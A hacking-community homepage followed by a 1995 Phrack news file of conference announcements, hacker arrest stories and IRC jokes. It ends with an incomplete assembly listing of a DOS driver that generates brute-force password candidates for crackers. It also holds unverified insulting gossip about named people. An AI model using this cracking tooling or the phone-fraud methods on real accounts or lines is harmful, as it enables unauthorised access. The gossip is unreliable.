Plateforme de Hacking

HackBBS.org est une communauté faisant évoluer un système de services vulnérables.

Nous apprenons à exploiter de manière collaborative des solutions permettant de détourner les systèmes d'informations.
Cet apprentissage nous permet d'améliorer les technologies que nous utilisons et/ou de mieux comprendre l'ingénierie social.

Nous défendons les valeurs de l'entraide, du challenge personnel et contribuons modestement à rendre l'expérience des utilisateurs finaux la plus agréable possible.

Vous pouvez nous rencontrer via notre salon irc.
Le forum est en cours de remplacement par une version plus moderne, et tout aussi faillible que l'ancien ^^.
A ce jours nous enregistrons plusieurs dizaines de hack réussi contre notre site, et ce chiffre est en constante évolution. Merci a tous les contributeurs!

La refonte est en version alpha. Cette nouvelle plateforme permet de pentester à distance sans avoir son matériel à disposition.
Via l'exécution de scripts python connecté en websocket à l'ihm web, nous pouvons piloter le chargement de scénario
d'attaque/défense en "multijoueur" ^^.
Le système permet de charger des scripts de bibliothèques partagées et de chiffrer les échanges selon les modules déployés.
Vous trouverez dans la rubrique article de nombreux tutoriels afin de mieux comprendre la sécurité informatique,
ainsi que différents articles plus poussés.
Hacker
  • Sniffing
  • Cracking
  • Buffer overflow
  • Créations d'exploits
  • Social engineering
  • L'anonymat sur le web, spoofing
  • Bypass-proxy, Bypass-firewall
  • Injection de code SSI, SQL, etc...
  • Utilisation d'exploits, création de scripts(php, irc, perl)
Nous vous recommandons de sniffer votre réseau lors de votre navigation sur le site. La refonte vous fournira un outillage pour réaliser vos attaques/défenses.
Flux RSS

flux RSS d'HackBBS Abonnez-vous. Soyez prévenu des tournois, challenges, actualités, ...
Recevez nos dernières actualités sur notre flux RSS.



Challenges
Vous pourrez également participer à de nombreux challenges en constant renouvellement (si possible :p)
Dernièrement, les missions relativent aux derniers produits open sources marchent bien :)

Votre ultime challenge sera de défacer HackBBS. De nombreuses failles sont présentes. A vous de les trouver et de les exploiter.

Cet ultime test permettra de constater votre réactions face à une faille.
Black ou White? ^^

Ezine du moment: p47-03.txt
                         ==Phrack Magazine==



              Volume Six, Issue Forty-Seven, File 3 of 22





                           //   //  /\   //   ====

                          //   //  //\\ //   ====

                         ==== //  //  \\/   ====



                     /\   //  // \\    //  /===   ====

                    //\\ //  //   //  //   \=\   ====

                   //  \\/    \\ //  //   ===/  ====



                                 PART I



------------------------------------------------------------------------------



-----BEGIN PGP SIGNED MESSAGE-----









  Phrack Magazine and Computer Security Technologies proudly present:



                     The 1995 Summer Security Conference



 SSSS  U    U  M     M  M     M   EEEEE   RRRR     CCCC   OOOO    N   N

S      U    U  MM   MM  MM   MM   E       R   R   C      O    O   NN  N

 SSS   U    U  M M M M  M M M M   EEE     RRRR    C      O    O   N N N

    S  U    U  M  M  M  M  M  M   E       R  R    C      O    O   N  NN

SSSS    UUUU   M     M  M     M   EEEEE   R   R    CCCC   OOOO    N   N



                               "SUMMERCON"



      June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia



This is the official announcement and open invitation to the 1995

incarnation of Summercon.  In the past, Summercon was an invite-only

hacker gathering held annually in St. Louis, Missouri.  Starting

with this incarnation, Summercon is open to any and all interested

parties:  Hackers, Phreaks, Pirates, Virus Writers, System Administrators,

Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers,

Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers,

Programmers, Conspiracy Nuts, Musicians and Nudists.



LOCATION:



The Clarion Hotel is located in downtown Atlanta, 9 miles from

Hartsfield International Airport and just a few blocks from the

Peachtree Center MARTA Station.





Considering the exorbitant expenses involved with attending other

conferences of this type, Rooms at Summercon are reduced to



                $65 per night for Single or Double Occupancy



      The Clarion Hotel Downtown, Courtland at 70 Houston St., NE,

                           Atlanta, GA 30303

       (404) 659-2660 or (800) 241-3828   (404) 524-5390 (fax)





No one likes to pay a hundred dollars a night.  We don't expect you

to have to.  Spend your money on room service, drinks in the hotel bar,

or on k-rad hacker t-shirts.  Remember:  Mention that you are attending

Summercon in order to receive the discount.



DIRECTIONS



75/85 Southbound - Exit 97 (Courtland).  Go 3 blocks south on Courtland

          then turn left on Houston (John Wesley Dobbs Ave.)

20 East - Exit 75/85 North at International.  Turn Left on Courtland at

          Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.)

20 West - Exit 75/85 North at International.  One block to Courtland

          and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.)



Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's

International Airport will drop you off at many hotels in the downtown

area, including the Clarion.  The shuttle should be no more than 12

dollars.  Fares may be paid at the Airport Shuttle in the Ground

Transportation area of the Airport Terminal.



MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a

convenient and inexpensive way to negotiate most of the Atlanta area.

Take the MARTA train from the Airport to the Peach Tree Center Station.

Walk three blocks down Houston to the intersection of Houston and

Courtland.  The MARTA fare will be roughly 2 dollars.



Taxis - The average cab fare from Atlanta's Airport to the downtown area

is roughly 30 dollars.



CONFERENCE INFO



It has always been our contention that cons are for socializing.

"Seekret Hacker InPh0" is never really discussed except in private

circles, so the only way anyone is going to get any is to meet new people

and take the initiative to start interesting conversations.



Because of this, the formal speaking portion of Summercon will be

held on one day, not two or three, leaving plenty of time for people

to explore the city, compare hacking techniques, or go trashing and

clubbing with their heretofore unseen online companions.



The "Conference" will be held on June 3rd from roughly 11:00 am until

6:00 pm with a 1 hour lunch break from 1:00 to 2:00.



NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM.  Audio Taping

and still photography will be permitted.





CURRENT LIST OF SPEAKERS:



Robert Steele   - Ex-Intelligence Agent, Founder and CEO of Open Source

                  Solutions (a private sector intelligence firm)



           Topic: Hackers from the Intelligence Perspective



Winn Schwartau  - Author of "Information Warfare" and "Terminal Compromise",

                  Publisher of Security Insider Report, and noted security

                  expert



           Topic: Electromagnetic Weaponry



Bob Stratton    - Information Security Expert from one of America's largest

                  Internet service providers



           Topic: The Future of TCP/IP Security



Eric Hughes     - Cryptography Expert and founding member of the "Cypherpunks"



           Topic: Cryptography, Banking, and Commerce



Annaliza Savage - London-based Director/Producer



           Topic: Discussion of her documentary "Unauthorized Access"

                  (Followed by a public screening of the film)



Chris Goggans   - Editor of Phrack Magazine and Summercon M.C.



           Topic: introductions, incidentals and a topic which is sure

                  to culminate in an international incident.





(Other Speakers May Be Added - Interested parties may contact scon@fc.net)



COSTS



Since other cons of this type have been charging from 25 to 40 dollars

entry fees, we are only charging 10 dollars.  Yes, that's correct,

TEN (10) dollars in US currency.  Money is far too scarce among the

hacker community to fleece everyone for money they will probably need

to eat with or pay for their hotel rooms.





WHAT TO DO IN ATLANTA:



To attempt to make everyone's stay in Atlanta more exciting, we are

contacting local establishments to arrange for special discounts and/or

price reductions for Summercon attendees.  Information will be handed

out regarding these arrangements at the conference.



Atlanta is a happening town.



Touristy Stuff                            Party Time



  The World of Coca-Cola                    Buckhead

  Underground Atlanta                       The Gold Club

  Georgia Dome (Baseball?)                  (Countless Other Clubs and Bars)

  Six Flags



CONTACTING SUMMERCON SPONSORS



You can contact the Summercon sponsors by several means:



    E-mail:     scon@fc.net



       WWW:     http://www.fc.net/scon.html



Snail Mail:     Phrack Magazine

  603 W. 13th #1A-278

  Austin, TX 78701





If deemed severely urgent, you can PGP your email with the following PGP

key:



- -----BEGIN PGP PUBLIC KEY BLOCK-----

Version: 2.6



mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP

Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk

Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR

tBRwaHJhY2tAd2VsbC5zZi5jYS51cw==

=evjv

- -----END PGP PUBLIC KEY BLOCK-----





See you in Atlanta!









-----BEGIN PGP SIGNATURE-----

Version: 2.6



iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4

46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q

mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5

uRix2FrftCY=

=m/Yt

-----END PGP SIGNATURE-----



------------------------------------------------------------------------------



UNAUTHORIZED ACCESS



"Unauthorized Access [is] a documentary that tells the story of the

computer underground from our side, it captures the hacker world

from Hamburg to Los Angeles and virtually everywhere in between."

                                        2600  The Hacker Quarterly



Computers are becoming an integral part of our everyday existence.

They are used to store and send a multitude of information, from

credit reports and bank withdrawals, to personal letters and highly

sensitive military documents.  So how secure are our computer

systems?



The computer hacker is an expert at infiltrating secured systems,

such as those at AT&T, TRW, NASA or the DMV.  Most computer systems

that have a telephone connection have been under siege at one time

or another, many without their owner's knowledge.  The really good

hackers can reroute the telephone systems, obtain highly sensitive

corporate and government documents, download individual's credit

reports, make free phone calls globally, read private electronic

mail and corporate bulletins and get away without ever leaving a

trace.



So who are these hackers?  Just exactly WHAT do they do and WHY do

they do it?  Are they really a threat?  What do they DO with the

information that they obtain?  What are the consequences of their

actions? Are hackers simply playing an intellectual game of chess

or are hackers using technology to fight back and take control of

a bureaucratic system that has previously appeared indestructible?



Unauthorized Access is a documentary that demistifies the hype and

propaganda surrounding the computer hacker.  Shot in 15 cities

and 4 countries, the film hopes to expose the truths of this subculture

focusing on the hackers themselves.



Unauthorized Access is a view from inside the global underground.



For a PAL (European) copy send a cheque/postal order for 15 British

Pounds or $25 for NTSC (American) standard to:



Savage Productions

Suite One

281 City Road

London  EC1V 1LA



------------------------------------------------------------------------------



                            ACCESS ALL AREAS

                           Hacking Conference



                          1st - 2nd July, 1995

                          (Saturday  & Sunday)

                       King's College, London, UK





-------------------------------WHAT-IT-IS---------------------------------



The first UK hacking conference, Access All Areas, is to be run in London

later this year.  It is aimed at hackers, phone phreaks, computer security

professionals, cyberpunks, law enforcement officials, net surfers,

programmers, and the computer underground.



It will be a chance for all sides of the computer world to get together,

discuss major issues, learn new tricks, educate others and meet "The

Enemy".







-------------------------------WHERE-IT-IS--------------------------------



Access All Areas is to be held during the first weekend of July, 1995 at

King's College, London.  King's College is located in central London on

The Strand and is one of the premier universities in England.







-----------------------------WHAT-WILL-HAPPEN-----------------------------



There will be a large lecture theatre that will be used for talks by

computer security professionals, legal experts and hackers alike.  The

topics under discussion will include hacking, phreaking, big brother and

the secret services, biometrics, cellular telephones, pagers, magstrips,

smart card technology, social engineering, Unix security risks, viruses,

legal aspects and much, much more.



Technical workshops will be running throughout the conference on several

topics listed above.



A video room, equipped with multiple large screen televisions, will be

showing various films, documentaries and other hacker related footage.



The conference facilities will also include a 10Mbps Internet link

connected to a local area network with various computers hanging off of it

and with extra ports to connect your laptop to.







------------------------------REGISTRATION--------------------------------



Registration will take place on the morning of Saturday 1st July from

9:00am until 12:00 noon, when the conference will commence.  Lectures and

workshops will run until late Saturday night and will continue on Sunday

2nd July from 9:00am until 6:00pm.







----------------------------------COST------------------------------------



The price of admission will be 25.00 British pounds (approximately US $40.00)

at the door and will include a door pass and conference programme.







-----------------------------ACCOMMODATION--------------------------------



Accommodation in university halls of residence is being offered for the

duration of the conference.  All prices quoted are per person, per night

and include full English breakfast. (In British pounds)





                             SINGLE       TWIN

        WELLINGTON HALL       22.00       16.75





Special prices for British and Overseas university students, holding

current student identification, are also available - please call King's

Campus Vacation Bureau for details.



All bookings must be made directly with the university.  They accept

payment by cash, cheque and credit card.



To making a booking call the following numbers...





        KING'S CAMPUS VACATION BUREAU



        Telephone : +44 (0)171 351 6011

        Fax       : +44 (0)171 352 7376







----------------------------MORE-INFORMATION------------------------------



If you would like more information about Access All Areas, including

pre-registration details then please contact one of the following...





        Telephone : +44 (0)973 500202

        Fax       : +44 (0)181 224 0547

        Email     : info@phate.demon.co.uk







------------------------------------------------------------------------------



                D I S T R I B U T E  W I D E L Y



                 *****FIRST CALL FOR PAPERS*****



                        InfoWarCon '95



               A 2 Day International Symposium

                     on Information Warfare



                      September 7-8, 1995

                   Stouffer Concourse Hotel

                        Arlington, VA



                        Presented by:

             National Computer Security Association

               Winn Schwartau and Interpact, Inc.

                   Robert Steele and OSS, Inc.





CONFERENCE OVERVIEW:



The  Information  Warfare Conference (InfoWarCon)  is  our third

international  conference  dedicated to the  exchange  of  ideas,

policies,  tactics, weapons, methodologies and defensive  posture

of Information Warfare on a local, national, and global basis.



InfoWarCon will bring together international experts from a broad

range  of disciplines to discuss and integrate concepts  in  this

rapidly  evolving field.  Attendees will intensely interact  with

the  speakers  and presenters as well as each other  to  increase

each other's understanding of the interrelatedness of the topics.



While  there are many interpretations of Information  Warfare  by

different groups, the current working definition we employ is:



     Information  Warfare is the use of information and  informa

     tion systems as weapons in a conflict where information  and

     information systems are the targets.



Information  Warfare  is broken down into three  categories,  and

InfoWarCon speakers and attendees will interactively examine them

all:



     Class  I:  Personal Privacy.  "In Cyberspace You Are  Guilty

     Until Proven Innocent."  The mass psychology of information.

     Privacy versus stability and law enforcement.



     Class  II: Industrial and Economic Espionage.  Domestic  and

     international  ramifications  and  postures  in  a  globally

     networked, competitive society.



     Class III: Global Information Warfare.  Nation-state  versus

     Nation-state  as an alternative to convention  warfare,  the

     military perspective and terrorism.



THE CONFERENCE



The  conference  is designed to be interactive -  with  extensive

interaction  between all participants. The  preliminary  contents

and discussions will focus on:



 - What is Information Warfare?

 - What Are the Targets?

 - Protecting the Global Financial Infrastructure

 - Military Perspectives on InfoWar

 - InfoWar Vs. Non-Lethal Warfare

 - Defending the U.S. Infrastructure

 - The Intelligence Community and Information

 - Open Source Intelligence

 - The Psychology of Information

 - Privacy Balances

 - Information As the Competitive Edge

 - International Cooperation

 - Denial of Service

 - Cyber-Terrorism

 - Offensive Terrorism

 - Offensive InfoWar Techniques

 - Defensive InfoWar Postures

 - Education and Awareness Training

 - Corporate Policy

 - Government Policy

 - Global Policy

 - Espionage

 - Export Controls of Information Flow

 - The Legal Perspective

 - The New Information Warriors



Plenary sessions will accommodate all attendees, while  break-out

sessions will provide more intimate presentations and interactiv

ity on topics of specific interests.



SUBMISSIONS:



Submission  for papers are now be accepted.  We are  looking  for

excellent speakers and presenters with new and novel concepts  of

Information Warfare.  You may submit papers on the topics  listed

above,  or on others of interest to you, your company or  govern

ment.



We  welcome innovative thought from the private sector, the  gov

ernment  (civilian, military and intelligence) and  the  interna

tional  community.  Submissions must be received by May 1,  1995,

and  notification  of  acceptance will occur  by  June  1,  1995.

Please    submit    2-3   page    presentation    outlines    to:



                        winn@infowar.com.



All  submissions  and the contents of InfoWarCon '95 will  be  in

English.   If you must submit a hard copy: Fax:  813.393.6361  or

snail  mail  to:  Interpact, Inc. 11511 Pine  St.,  Seminole,  FL

34642



All submissions and presentation should be unclassified, as  they

will become Open Source upon submission and/or acceptance.



SPONSORS:



The Information Warfare Symposium is currently choosing  sponsors

for various functions.



 Continental Breakfast, Day 1 and Day 2

 Morning Coffee Break, Day 1 and Day 2

 Lunch, Day 1 and Day 2

 Afternoon Coffee Break, Day 1 and Day 2

 Cocktail Party, Day 1



Each Corporate or Organizational sponsor will be included in  all

promotional  materials and  Symposium function.   For more infor-

mation, contact Paul Gates at  the NCSA.  Voice: 717.258.1816  or

email: 747774.1326@Compuserve.com.



EXHIBITS:



Limited space is available for table-top displays for  commercial

or  governmental products, services, educational or other  promo

tion. For further information, contact Paul Gates at the National

Computer Security  Association. 717.258.1816



REGISTRATION:



     Payment made BEFORE July 1, 1995:



                (   )  $445.00     NCSA Member/OSS Attendee

  (   )  $545.00     All others



     Payment made AFTER July 1, 1995:



  (   )  $495.00     NCSA Members/OSS Attendees

  (   )  $595.00     All others



(  )  I'M INTERESTED, but would like more information sent to the

      address above.  Please include a free copy of your 32 page

      "Information Security Resource Catalog".



(  )  I'd like to know more about NCSA on-site training, security

      audits and  consulting services.  Please have someone give me

      a call.



MAIL OR FAX TO:



                 National Computer Security Association

                 10 South Courthouse Avenue

                 Carlisle, PA 17013

                 Phone 717-258-1816 or FAX 717-243-8642

                 EMAIL:       74774.1326@compuserve.com

                 CompuServe:  GO NCSAFORUM



  Winn Schwartau Interpact, Inc.

  Information Security & Warfare

  V:813.393.6600 F:813.393.6361

            Email: Winn@Infowar.Com



------------------------------------------------------------------------------



    Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested

on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale

of a device to commit Telecommunications fraud charges. He is being held in

Delaware County Prison in lieu of $100,000.00 Bail. His story follows.



    On the evening of the 13th Bernie S. received a page from his mail drop.

Some people he knew from Florida had stopped in at his mail drop thinking

it was his address.  They were looking to purchase several 6.5 Mhz Crystals.

These crystals when used to replace the standard crystal in the RADIO SHACK

Hand Telephone dialer, and with some programming, produce tones that trick

pay phones into believing they have received coins.  These are commonly

referred to as "red boxes" and got their name from an actual red box pulled

from a pay phone in the late seventies by some curious person.



    Ed Cummings met these people at a local 7-11 (which 7-11?) where he was

to sell the widely used electronic timing crystals for roughly $4 a piece.

The purchaser only had two twenty dollar bills and Ed Cummings no change.

Ed Cummings went into the 7-11 to get some change to make the transaction.

A police officer noticed a van parked in the parking lot of the 7-11 with

more several African Americans inside.  As Ed was leaving the 7-11 he noticed

fifteen police cars pulling into the parking lot of the 7-11.



    Next thing he knew the police were asking him if they could `rifle`

through his car.  He said no.  Moments later as he was talking to a Detective

and noticed another police officer going through his car.  He asked the officer

to stop.  They did not, in all the police confiscated a few hundred 6.5Mhz

crystals (which he resells for roughly $4 a piece) and a large box of 100

dialers.  The police told him they would get back to him,  and he could have

his electronics back if the contents of the bag were legal.  In the contents

of the seized items was one modified dialer, that a customer returned after

modification explaining that it did not work, a broken red box.



    The next day Ed `Bernie S.` Cummings was over at a friend`s house working

on their computer when eight to ten plain clothed armed men burst into the

house and ordered him and his friends to freeze.  They cuffed him and took him

to a holding cell (what jail?).  There he was left without a blanket or jacket

to sleep with in the cold cell.



    That evening the Secret Service had been called in when someone figured

out what the dialers and crystals would do when put together.  The

United States Secret Service found his home and entered it, while they were

questioning him.



    The next morning at his arraignment he was finally told of the charges

he was being held upon. They were Two misdemeanor Charges of manufacture,

Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful

use of a computer charges. His bail was automatically set to $100,000.00

because Ed Cummings refused talk with the police without his attorney present.



    The Secret Service presented to the judge a 9 page inventory of what

they had found in his home.   On that inventory there 14 computers. 2 printers.

more Boxes of bios chips for the systems he worked with. Eprom burners which

the Federal Agents had labeled "Cellular telephone chip reprogramming adapters"

Eproms are used in everything from Automobile computers to personal computers.

They also confiscated his toolbox of screw drivers, wire clippers and other

computer oriented tools he used for his consulting job.



    The Judge dropped the Two unlawful use of a computer charges due to

the fact that the evidence was circumstantial and the county had no actual

evidence that Ed had ever used the computers in question.



    As of 3/27/1995 Ed Cummings is still in Delaware County Prison

awaiting his trial.  His trial has not yet been scheduled and Ed will most

likely not raise the One Hundred Thousand Dollars needed to be released on

bail.



------------------------------------------------------------------------------



"Don't believe the hype."  -  Public Enemy, 1988



This file's purpose is to clear up any misconceptions about the recent

situation that has come upon the sociopolitical group known as KoV.



As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for

ANYTHING. We have received several tip-offs from private sources regarding

a supposed "FBI investigation" of our group that is purported to be active

at this very minute. However, with the exception of a few VERY suspicious

incidents and coincidences, there has been NO HARD EVIDENCE thus far about

ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for

the integrity of our innocence, we must stress that nothing has gone down.



Yet.



We have very good reason to believe that a few of those among us are about

to be charged with various false accusations by a local university. However

the current mental state of the person in charge of this charade is also in

question. Therefore it would be logical to assume nothing. The conflicting

tip-offs, rumors, warnings and threats that we have received make it even

more difficult to get a clear picture of exactly what is going on. We have

heard so many things from so many different sources, both credible and

questionable, that we would be hard-pressed to give an accurate evaluation

of the current state of things.



What we can say for sure, however, is that KoV officially died on Monday,

January 23, 1995, along with its communications network, KoVNet. This

promises to be a great loss to the open-minded and sociopolitical community

as well as the free-thinkers and activists who supported us so generously.

Our reasons for disbanding the group were many, but the foremost was in

light of the current situation we are facing.



Consider this last obstacle our final, stalwart stand against the evils of

AmeriKKKan government and its various greedy, capitalistic agencies.

From the moment of KoV's conception, they have publicly sought to destroy

us; to silence our questioning of authority, to oppress our free-thinking

minds, and to close off our intellectual channels of communication. They

have even gone so far as to stalk us in public places. 'Tis a shame indeed.



If you have any questions or if you wish to contact us for any reason,

you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV".

I will try to post further updates of this saga to CiPNet, ThrashNet,

QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can.

We would appreciate any support that other h/p, art or political groups can

lend us. Until then, my friends...



-Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV



------------------------------------------------------------------------------



                What happens when you are caught beige boxing.



                        by Rush 2





        Yeah yeah, I'm the only one.  But here is a generally interesting

     description of everything to getting caught to arraignment.



        Well about 5 months ago i needed to set up a conference really quick..

     it was about 12:00  (never knew there was a 10:00 pm curfew in that area)

     and went to a 25 pair box at this local strip mall.  Well I was out there

     the box was already open and I was just about to start testing pairs to

     see which was connected and what wasn't.



        All of a sudden, i hear this loud screeching sound of a car coming

     to a skid from doing about 90mph.  I turned and saw that typically dirty

     squad car about to hit me.. you know the car, mud and dust on the tires

     and body, coffee and smudge marks all over the windshield.  i got on my

     bike and started to run.  Now the thing is I COULD have gotten away.. the

     pathetic excuse for a cop had run not more than 10 yards after me and

     decided that I was a threat so he pulled his handgun and yelled.  I saw

     this and thought it would be wiser to stop than get shot.



        Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did

     not know i was less than a half mile from a police station and they were

     looking for a prowler in the general area.  The police did the normal,

     called me scum, asked me what i was doing, searched me until they were

     satisfied...  than picked me up and threw me in the car... the funny

     thing was they didn't see my phone until they threw me into the back seat

     and the cord fell out.. (they never saw the page of notes and 'naughty'

     material in my pocket though it was about 4 inches thick and sticking out

     that a blind man could see it.



        Well they got me to the station and pried my info out, and called my

     father... I came up with a good enough story about some made up user

     who told me to go across the street and plug in..  then I was told I

     would be dealt with in the next week...  I did not receive anything for

     three and a half months.



        Once the time came for the arraignment (for a juvenile they called it

     an intake).  I got to go to the police station, sit for about 3 hours (as

     if i thought they would be on time) until I waited for my probation

     officer. Finally she got there and we proceeded to talk.  She explained

     all of the charges and my lawyer (interesting guy) laughed, I was being

     charged with prowling (could be disputed I was on a public sidewalk and

     there in that strip mall is a 24 hr laundry mat), loitering (again that

     could be disputed), and attempted theft of services (though I NEVER even

     plugged in).



        After this was all said i spent the next hour talking with the lady

     in private.  I immediately found she had an interest in computers and was

     having a problem with her home pc.  So I easily changed the topic to my

     fascination in computers and solved her problem with her computer, and

     answered at least 50 questions about them.  In the last 10-15 minutes of

     the conversation all i could get from her were statements about how

     impressed and how intrigued she was with me.  She ended up giving me a

     look (that was hard to judge but i am staying away from this chick) that

     was either confusion or attraction, slipped me a card with her home phone

     number and name and called back in my lawyer and parents.



        Once they got back in, all that she really said was I was a great boy,

     that she would like to see me do more with my time besides computers, and

     that she was taking my sentence of 12 months formal probation with 300

     hours of community service to 3 months of informal probation with 30

     hours of community service.  That and she said bell was asking her what

     to do and she would tell them that it was a non issue since I did not

     plug in and even if I had it would not be their concern unless I had

     plugged in to the telco access part of the network interface.



        Well I have yet to receive official record of having to perform

     the community service or the probation but I called my probation officer

     yesterday and said she wasn't putting the community service into the

     punishment and it has been an equivalent amount of time to just say that

     since I haven't gotten in trouble since she will count the probation as

     already served.  Luckily she based all other needs of me on the report

     from a teacher, and with my luck she picked the one teacher, my computers

     teacher, that no matter what I did or said would lie and say I didn't.





        Thanks to erikb for publishing this, and greets to CXrank, paradox,

     dark phiber, the fat cop (who spilled his coffee and box of donuts

     coming after me) that made this all possible,  and to everyone else.





                        -rush 2

            http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html





                Look for My site, unforeseen danger soon to be on a 28.8 slip

            and by the end of the summer on a 500k slip connect.





------------------------------------------------------------------------------



[Something found on IRC]



Danny Partridge         Emmanuel Goldstein

(AKA Danny Bonaduce:    (AKA Eric Corley:

a child star from       the child-like publisher

"The Partridge Family"  of 26oo magazine.

----------------------  ------------------



Hosts a boring local    Hosts a boring local

radio program.          radio program.



Quasi Celebrity         Quasi Celebrity

Status among            Status among

70's freaks             telephone phreaks



Periods of Heavy        Periods of Heavy

Drug Usage              Drug Usage



Involved in Sex         Involved in Sex

Scandal with            Scandal with

another man             another man



Last name is            Friends with Phiber

"Bonaduce"              Optik whose first

                        handle was "Il Duce"



Supplements incoming    Supplements incoming

by doing desperate      by doing desperate

local talk shows        local talk shows

whenever he can.        whenever he can.



------------------------------------------------------------------------------



Top 10 #hack fights that would be the coolest to see.

(And no, Ophie's not in it twice just because she's a girl...)

===========================================================================



10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling

featuring KL & TK.



9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the

one after that... or, uh...



8.) C-Curve and Elite Entity, "Who's who?"



7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere."

(Or: "I'm totally numb, let me hug you!!!")



6.) Dan Farmer and Pete Shipley: "Whips vs. Chains"



5.) Grayarea vs. Netcom "No, *I* want root..."



4.) WWF Wrestling with Len and |al|.



3.) Ophie vs. Voyager, "Night of the Living Dead."



2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle."

and the number one #hack fight is



1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl"





------------------------------------------------------------------------------



P A S S W O R D   E N G I N E  (for IBM PC's)                by Uncle Armpit

+++++++++++++++++++++++++++++++++++++++++++++



   The device driver code listed below provides a data stream of passwords.

The device driver approach was used to speed up the process

of cracking passwords on an incremental basis. The usual approach was

to generate the passwords to a file, then reading the file, etc..the device

driver approach circumvents these file storage problems, and others, such as

having enough free disk space and delays from disk i/o.

    This driver operates completely in memory (approx. 0.5Kb)



How practical is this?

----------------------

This program would be very useful if you think you may know what strategy

the user/admin uses for picking out their passwords.  Without eliciting some

sort of a strategy, forget it-- unless your desperate enough!!





A "strategy" could consist of any of these possible advantages--



1) default passwords (ie: SIN, student #, birth date, phone number...)

2) the mutation of a lUSERs' known password from another system

3) viewing the mark typing in most of their password with a couple

   of unseen characters

4) etc...



---------------------------

  With the sample device driver provided, passwords starting at

'aaaaaaa' and ending with 'zzzzzzz' will be generated.  The length

of the password string can be modified by changing the length of

the password string itself (that is, the variable "number").  The

range of characters in the passwords can also be changed by

modifying the following two lines:



;hackdrv.sys

;.

;.

;

for ending character--

cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range



...and for starting character

cmp byte ptr [number+si],'a'   ;starting char. in range

;

;----------------------



for instance, if you wished to generate numbers from "0000000" to

"9999999"



-change the ending character to:

cmp byte ptr [number+si],'9'+1



-starting character to:

cmp byte ptr [number+si],'0'



and "number" variable from 'aaaaaa' to '0000000' and then

recompile..



-----



 ..or in the third case, if u had observed a lUSER type in most of

their password, you may want to rewrite the code to limit the

search.  IE: limit the keys to a certain quadrant of the keyboard.

   Modify the code starting at "reiterate:"  and ending at "inc_num

endp" for this.

=================================================================





/'nuff of this!/   How do I get things working?

-----------------------------------------------



Compile the device driver "hackdrv.sys", and the second program,

"modpwd.asm". Then specify the device driver inside config.sys

(ie: "c:\hackdrv.sys").  The code below was compiled with the a86

compiler, v3.03.  Some modifications might be needed to work with

other compilers.



To use it in prgs like crackerjack, type in the following on the

command line:





c:\>jack -pwfile: -word:hackpwd



------

 If you had stopped a cracker program (eg: crackerjack) and want to

pick up from where you left off, run the program "modpwd.com".



 This program can change HACKDRVs password through-



 a) a command line argument (ie: "modpwd aabbbbe")

 b) executing the program with no parameters (this method also

    displays the current password in memory)







                                                   Happy Hacking,

                                                   Uncle Armpit



;-----------------------cut here--------------------------------

;Program HACKDRV.SYS

;

org 0h

next_dev dd -1

attribute dw 0c000h            ;character device w/ ioctl calls

strategy dw dev_strategy

interrupt dw dev_int

dev_name db 'HACKPWD '

countr dw offset number

number db 'aaaaaa',0ah         ;<----six characters, lower case

numsize equ $-number - 2

afternum:



;working space for device driver

rh_ofs dw ?

rh_seg dw ?



dev_strategy:               ;strategy routine

mov cs:rh_seg,es

mov cs:rh_ofs,bx

retf



dev_int:                    ;interrupt routine

pushf

push ds

push es

push ax

push bx

push cx

push dx

push di

push si



cld

push cs

pop ds



mov bx,cs:rh_seg

mov es,bx

mov bx,cs:rh_ofs



mov al,es:[bx]+2

rol al,1

mov di,offset cmdtab

xor ah,ah

add di,ax

jmp word ptr[di]





cmdtab:            ;command table

dw init        ;0

dw exit3       ;1

dw exit3       ;2

dw ioctl_read  ;3

dw do_read     ;4

dw exit3       ;5

dw exit3       ;6

dw exit3       ;7

dw exit3       ;8

dw exit3       ;9

dw exit3       ;10

dw exit3       ;11

dw ioctl_write ;12

dw exit3       ;13

dw 5 dup (offset exit3)







ioctl_read:

push es

push bx



mov si,es:[bx+10h]

mov di,es:[bx+0eh]

mov es,si



push cs

pop ds

mov si,offset number

xor cx,cx



get_char:

lodsb

stosb

inc cl

cmp al,0ah

jz ioctl_rend

jmp get_char



ioctl_rend:

pop bx

pop es

mov es:[bx+012h],cx

mov cs:countr,offset number

jmp exit2



ioctl_write:

push es

push bx

mov si,es:[bx+010h]

mov ds,si

mov si,es:[bx+0eh]

mov cx,numsize+1               ;es:[bx+012h]

push cs

pop es

mov di,offset number

repe movsb

pop es

pop bx

mov cs:countr,offset number

jmp exit2





do_read:

push es

push bx





push cs

pop ds



mov si,[countr]

inc si                      ;word ptr [countr]

cmp si,offset afternum

jnz is_okay

mov si,offset number

